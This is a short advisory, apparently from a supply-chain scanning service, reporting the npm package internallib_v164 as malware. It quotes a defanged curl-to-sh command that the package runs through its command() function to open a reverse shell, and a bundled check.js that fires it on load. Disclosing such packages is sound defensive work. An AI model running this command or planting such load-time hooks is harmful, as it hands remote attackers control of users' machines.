LWA-2026-10995 confirmed malware

internallib_v164@1.0.7

Malicious code in internallib_v164 (npm)

T1059.007 · JavaScriptT1071.001 · Web ProtocolsT1105 · Ingress Tool Transfer

Analysis

The package's exported command() function executes a reverse shell via child_process: it runs `curl hxxps://reverse-shell[.]sh/10[.]0[.]72[.]234:4444 | sh`, fetching a reverse-shell payload from the reverse-shell.sh service and piping it to a shell that connects back to listener 10[.]0[.]72[.]234:4444. A bundled check.js requires the module and invokes command(), so loading the package triggers the shell. The reverse shell gives the remote operator command execution on the installer's machine.

analyzed by
Leitwacht
first seen
Aug 11, 2026, 08:09 PM
analyzed
Aug 11, 2026, 08:09 PM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.